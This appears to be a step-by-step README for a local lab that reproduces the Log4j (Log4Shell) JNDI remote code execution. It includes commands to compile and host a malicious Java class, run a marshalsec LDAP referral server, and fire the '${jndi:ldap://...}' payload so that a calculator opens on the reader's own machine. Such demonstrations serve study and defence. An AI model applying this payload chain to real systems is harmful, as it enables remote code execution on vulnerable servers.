- Step 1 : Clone this repository.
- Step 2 : Move
Exploit.javafile to a different folder. Like in my case I've created a folderrceinside home directory./home/coldfusionx/rce
- Step 3 : Peeking at
Exploit.javaHere you can change the remote code to anything, in this case this would pop upgnome-calculatoron a ubuntu machine.
- Step 4 : Next we need to compile
Exploit.javausing commandjavac Exploit.java, once successfully compiled we should see a new fileExploit.classgets created.
- Step 5 : Start a python http server to host
Exploit.classusingpython3 -m http.server 8888, alternatively you can also use a php server using commandphp -S 127.0.0.1:8888.
- Step 6 : Load the project files into IntelliJ Idea and let maven complete the file indexing. Once completed your project should look like this :
- Step 7 : For running the project, we need to create a configuration, click on
Add Configuration
1. Select `Application`
2. Select the main class
3. Select the JDK and apply.
4. You should see Log4j Applicaton created, ready to run.
- Step 8 : Next we start the LDAPRefServer using marshalsec :
- cd
marshasec - Run
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"to start the LDAP server, here127.0.0.1:8888is the python server hostingExploit.classhence we specify/#Exploit
-
Step 9 : Edit the JNDI payload in log4j.java as per your requirement,
logger.error("${jndi:ldap://127.0.0.1:1389/Exploit}");In this case we are loading the remote classExploit, the LDAP referrer server will redirect the request to our python server hosting the maliciousExploitclass. -
Step 10 : Run
Log4j, On successful run you should see a gnome calculator pop up.
